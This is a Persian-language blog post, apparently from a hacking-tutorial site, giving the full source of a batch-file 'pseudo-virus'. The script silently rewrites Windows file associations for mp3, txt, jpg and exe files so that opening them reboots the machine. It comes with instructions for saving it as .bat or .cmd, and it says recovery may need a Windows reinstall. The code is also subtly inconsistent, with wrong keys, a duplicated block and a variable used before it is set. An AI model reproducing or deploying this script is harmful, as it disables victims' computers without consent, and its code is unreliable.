| تبليغات | X |
HackMind |
All About Computer |
|
درباره وبلاگ
 منوی اصلی
آرشیو مطالب
لينك دوستان
آخرین مقالات
آرشیو موضوعی
آمار سايت
del.icio.us
|
ساخت يك شبه ويروس قسمت دوم
خوب امروز هم می خوام به ساخت یه شبه ویروس ساده دیگه بپردازم امیدوارم خوشتون بیاد.
البته بازم ميگم من اين نوع فايلها يعني bat. و cmd. رو اصلا ويروس حساب نمي يارم چون خيلي تابلو و ضعيفن و قصدم آموزش فرمانهاي پيشرفته ويندوزه حالا خودتون هر چي مي خواين بهش بگين. اينجا بصورت خلاصه همون ويروس مي گيم.
بريم سره اصل مطلب !!
اين ويروس چكار ميکنه :
اين ويروس يكسري تغييرات در رجيستري ويندوز ميده كه باعث ميشه كه وقتي ما يكي از اين فرمتها يعني txt, exe, jpg, mp3 را اجرا كرديم فرمان shutdown اجرا مي شه و سيستم و رستارت مي كنه.
شما خودتون بعدا مي تونيد هر فرمتي رو اضافه كنيد.
سورس ويروس:
@echo off
rem ------------mp3 file------------------ reg add HKCR\.mp3 /f /ve /d "mp3file" > nul reg add HKCR\mp3file > nul reg add HKCR\mp3file\shell > nul reg add HKCR\mp3file\shell\open > nul reg add HKCR\mp3file\shell\open\command /f /ve /d %C% > nul rem -------------------------------------- rem ------------txt file------------------
reg add HKCR\.txt /f /ve /d "txtfile"> nul reg add HKCR\txtfile > nul reg add HKCR\txtfile\shell > nul reg add HKCR\txtfile\shell\open > nul reg add HKCR\txtfile\shell\open\command /f /ve /d %C% > nul rem -------------------------------------- rem ------------jpg file------------------
reg add HKCR\.jpg /f /ve /d "txtfile"> nul reg add HKCR\jpgfile > nul reg add HKCR\jpgfile\shell > nul reg add HKCR\jpgfile\shell\open > nul reg add HKCR\jpgfile\shell\open\command /f /ve /d %C% > nul rem -------------------------------------- rem ------------exe file------------------
reg add HKCR\.txt /f /ve /d "txtfile"> nul reg add HKCR\txtfile > nul reg add HKCR\txtfile\shell > nul reg add HKCR\txtfile\shell\open > nul reg add HKCR\txtfile\shell\open\command /f /ve /d %C% > nul rem -------------------------------------- rem --------------value of C-------------
set C="shutdown -r -t 0" rem -------------------------------------- توضيحات :
اين سورس زياد توضيح نمي خواد پس من هم فقط دستور reg رو كه بيشتر هم استفاده شده توضيح ميدم
شما با دستور reg مي تونيد در رجيستري هر تغييري مي خواين انجام بدين البته محدوديت هايي هم داره ولي مي شه فرمان قويي در ويندوز حساب مياد و داراي پارامتر هاي زيادي هست كه ما فقط پارمتر add رو توضيح ميدیم براي اطلاعات بيشتر هم فرمان زير رو در خط فرمان تايپ كنيد
reg /?
صورت كلي قرمان reg add به اين صورته
REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]
كه به ترتيب :
ADD : براي اضافه كردن يك كليد يا تغيير مقدار يك كليد
KeyName : آدرس شاخه ي مورد نظر در رجيستري
v ValueName/ : مقداري را اضافه كرده يا تغيير ميدهد
ve/ : مقدار پيش فرض را مشخص مي كند
t type/ : نوع متغيير
d data/ : دادهاي است كه به مقادير جديد يا مقادير موحود منسوب مي شود
f/ : براي تغييراتي كه مي دهد سوالي از كاربر نمي پرسد
البته براي فهم بهتر ، بهتره كمي با ساختار فايلها در رجيستري آشنا باشيد.
حالا با اين سورس چكار كنيم؟
حوب اينم كه معلومه notepad يا هر ويراشگري كه باهاش راحتين رو باز كنيد و سورس رو داخلش قرار دهيد بعد با فرمت bat. یا cmd. ذخيره كنيد
اگر كامپيوتري اين فايل رو اجرا كرد چگونه مي شه تعميرش كرد؟
1- اگر از رجيستري نسخه پشتيباني وجود داشته باشد
2 - كاربر از ساختار رجيستري به خوبي آگاه باشد و خود تعميرش كند.
در غير اين صورت فكر كنم چارهاي جز نصب دوباره ويندوز نداشته باشد
خوب اميدوارم استفاده لازم رو برده باشيد و در امر يادگيري ازش استفاده كنيد
در ضمن هر گونه مشكل و انتقاد يا پيشنهادي هم دارين ممنون مي شم كه بيان كنيد
موفق باشيد
|+| نوشته شده توسط آرش در یکشنبه بیست و پنجم دی 1384 | موضوع: دیگر مقالات  |
|
